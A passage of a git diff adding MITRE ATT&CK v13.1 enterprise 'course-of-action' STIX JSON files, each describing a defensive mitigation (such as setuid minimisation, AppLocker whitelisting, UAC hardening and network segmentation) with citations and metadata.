"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885.json new file mode 100644 index 0000000000000000000000000000000000000000..072dca8094d31c756e4f45582e6e986988f1fc57 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--7a621d39-4492-46b5-b2ab-66a9524f8707", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1162", + "external_id": "T1162" + }, + { + "url": "https://support.apple.com/en-us/HT204005", + "description": "Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.", + "source_name": "Re-Open windows on Mac" + } + ], + "modified": "2019-07-24T19:49:43.716Z", + "name": "Login Item Mitigation", + "description": "Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically (Citation: Re-Open windows on Mac).", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19.json new file mode 100644 index 0000000000000000000000000000000000000000..4a3b3bb47044f0438e14ede5664791d0a0979cdf --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--057597b1-832f-4d62-b43f-d9f1778b4b04", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1166", + "external_id": "T1166" + } + ], + "modified": "2019-07-25T11:43:19.870Z", + "name": "Setuid and Setgid Mitigation", + "description": "Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2.json new file mode 100644 index 0000000000000000000000000000000000000000..3b46ae856926661c29587a5dc1e1652605649ce9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--02610a06-1971-45d0-8632-6fb2bf51864c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1223", + "external_id": "T1223" + }, + { + "url": "https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913", + "description": "Kiwi. (2016, April 6). Breakout Recap: Cybersecurity Best Practices Part 1 - Preventing Opportunistic Attacks. Retrieved October 3, 2018.", + "source_name": "PaloAlto Preventing Opportunistic Attacks Apr 2016" + } + ], + "modified": "2019-07-24T14:19:23.148Z", + "name": "Compiled HTML File Mitigation", + "description": "Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files. (Citation: PaloAlto Preventing Opportunistic Attacks Apr 2016) Also consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259.json new file mode 100644 index 0000000000000000000000000000000000000000..6a9160e4dfe0f701ba18aafce758643e373b166f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--2e5ff902-a0db-4a4a-9cac-a549df452347", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1084", + "external_id": "T1084" + }, + { + "source_name": "FireEye WMI 2015", + "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" + } + ], + "modified": "2019-07-25T12:35:09.565Z", + "name": "Windows Management Instrumentation Event Subscription Mitigation", + "description": "Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1022138b-497c-40e6-b53a-13351cbd4090.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1022138b-497c-40e6-b53a-13351cbd4090.json new file mode 100644 index 0000000000000000000000000000000000000000..3ee5ef26d40bd902c9e43b0d11928b51fc124d2b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1022138b-497c-40e6-b53a-13351cbd4090.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--444ad1b5-fb7c-4bf4-8562-49aa031cd4ce", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1022138b-497c-40e6-b53a-13351cbd4090", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1044", + "url": "https://attack.mitre.org/mitigations/T1044", + "source_name": "mitre-attack" + }, + { + "url": "https://github.com/mattifestation/PowerSploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "source_name": "Powersploit" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://seclists.org/fulldisclosure/2015/Dec/34", + "description": "Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe\tallows remote code execution with escalation of privilege. Retrieved March 10, 2017.", + "source_name": "Seclists Kanthak 7zip Installer" + } + ], + "modified": "2021-08-23T20:25:21.486Z", + "name": "File System Permissions Weakness Mitigation", + "description": "Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses. (Citation: Powersploit)\n\nIdentify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able. (Citation: Seclists Kanthak 7zip Installer)\n\nTurn off UAC's privilege elevation for standard users [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]to automatically deny elevation requests, add: \"ConsentPromptBehaviorUser\"=dword:00000000 (Citation: Seclists Kanthak 7zip Installer). Consider enabling installer detection for all users by adding: \"EnableInstallerDetection\"=dword:00000001. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: \"EnableInstallerDetection\"=dword:00000000. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--10571bf2-8073-4edf-a71c-23bad225532e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--10571bf2-8073-4edf-a71c-23bad225532e.json new file mode 100644 index 0000000000000000000000000000000000000000..b8f37d2f8d1a2067384c491bf90f14be0f8b7c3a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--10571bf2-8073-4edf-a71c-23bad225532e.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--845394b1-952b-4757-b8e6-c78ef5fd7c63", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--10571bf2-8073-4edf-a71c-23bad225532e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1103", + "url": "https://attack.mitre.org/mitigations/T1103", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + } + ], + "modified": "2020-01-17T16:45:23.250Z", + "name": "AppInit DLLs Mitigation", + "description": "Upgrade to Windows 8 or later and enable secure boot.\n\nIdentify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13.json new file mode 100644 index 0000000000000000000000000000000000000000..77ab41df2108468b664c02923b84b0369d352f87 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--7e7f0180-1377-48f2-9636-55dead0da4d2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1159", + "external_id": "T1159" + } + ], + "modified": "2019-07-24T19:47:59.038Z", + "name": "Launch Agent Mitigation", + "description": "Restrict user's abilities to create Launch Agents with group policy.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c.json new file mode 100644 index 0000000000000000000000000000000000000000..5e0b09aad8c4955ac496d3f54552313f5b68f8fb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--b944638f-f933-4578-8222-b1950b683e41", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c", + "type": "course-of-action", + "created": "2019-06-10T20:46:02.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1031", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "modified": "2019-06-10T20:46:02.263Z", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432.json new file mode 100644 index 0000000000000000000000000000000000000000..90942e64ef865cb238efbea0ab4ca57d8d7eea21 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--e6b115c0-1e8c-45b3-be5f-6cf2c01a23ae", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1117", + "external_id": "T1117" + }, + { + "url": "https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET", + "description": "National Security Agency. (2016, May 4). Secure Host Baseline EMET. Retrieved June 22, 2016.", + "source_name": "Secure Host Baseline EMET" + } + ], + "modified": "2019-07-25T11:32:22.755Z", + "name": "Regsvr32 Mitigation", + "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43.json new file mode 100644 index 0000000000000000000000000000000000000000..abd6c59ec2be04324d30a765a3c6775f05c000f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--878a4024-43c2-4110-b900-8db0781b6d0e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1147", + "external_id": "T1147" + } + ], + "modified": "2019-07-24T19:36:24.202Z", + "name": "Hidden Users Mitigation", + "description": "If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the /Library/Preferences/com.apple.loginwindow Hide500Users value will force all users to be visible.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--13cad982-35e3-4340-9095-7124b653df4b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--13cad982-35e3-4340-9095-7124b653df4b.json new file mode 100644 index 0000000000000000000000000000000000000000..d0f6b69276331899644e6a1891cbf77f7f2f117b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--13cad982-35e3-4340-9095-7124b653df4b.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--b89bfe70-b9e1-47e9-ba39-01682629f3da", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--13cad982-35e3-4340-9095-7124b653df4b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1213", + "external_id": "T1213" + } + ], + "modified": "2019-07-24T19:06:19.932Z", + "name": "Data from Information Repositories Mitigation", + "description": "To mitigate adversary access to information repositories for collection:\n\n* Develop and publish policies that define acceptable information to be stored\n* Appropriate implementation of access control mechanisms that include both authentication and appropriate authorization\n* Enforce the principle of least-privilege\n* Periodic privilege review of accounts\n* Mitigate access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to access repositories", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62.json new file mode 100644 index 0000000000000000000000000000000000000000..b347dfa0ef00fef97800b294d7938b4a900f3c08 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--5d965f31-7f50-4a80-b385-42e8ed3d9573", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--14b63e6b-7531-4476-9e60-02cc5db48b62", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1210", + "external_id": "T1210" + }, + { + "source_name": "Ars Technica Pwn2Own 2017 VM Escape", + "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.", + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" + }, + { + "source_name": "TechNet Moving Beyond EMET", + "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II \u2013 Windows Defender Exploit Guard. Retrieved March 12, 2018.", + "url": "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" + }, + { + "source_name": "Wikipedia Control Flow Integrity", + "description": "Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.", + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity" + } + ], + "modified": "2019-07-24T19:26:53.547Z", + "name": "Exploitation of Remote Services Mitigation", + "description": "Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods. Minimize available services to only those that are necessary. Regularly scan the internal network for available services to identify new and potentially vulnerable services. Minimize permissions and access for service accounts to limit impact of exploitation.\n\nUpdate software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nSecurity applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e.json new file mode 100644 index 0000000000000000000000000000000000000000..5a291a28f5cd9f2714744bc8d7ac4934d3b3ae96 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--5b84ba8d-fdd0-49ec-84e6-9265d153ac54", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e", + "type": "course-of-action", + "created": "2019-02-15T13:04:25.150Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1482", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1482" + }, + { + "source_name": "Harmj0y Domain Trusts", + "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019." + } + ], + "modified": "2020-09-17T18:26:17.815Z", + "name": "Domain Trust Discovery Mitigation", + "description": "Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930.json new file mode 100644 index 0000000000000000000000000000000000000000..c9af26b0f6c82573440e42fe4563c6d31f938258 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--ea9637ca-4ccf-4129-84e4-1582388bbd99", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1072", + "external_id": "T1072" + } + ], + "modified": "2019-07-25T12:27:40.782Z", + "name": "Third-party Software Mitigation", + "description": "Evaluate the security of third-party software that could be used in the enterprise environment. Ensure that access to management systems for third-party systems is limited, monitored, and secure. Have a strict approval policy for use of third-party systems.\n\nGrant access to Third-party systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multi-factor authentication. Verify that account credentials that may be used to access third-party systems are unique and not used throughout the enterprise network. Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers in the same environment. Ensure third-party systems are regularly patched by users or the provider to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). \n\nEnsure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required.\n\nWhere the third-party system is used for deployment services, ensure that it can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the third-party system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 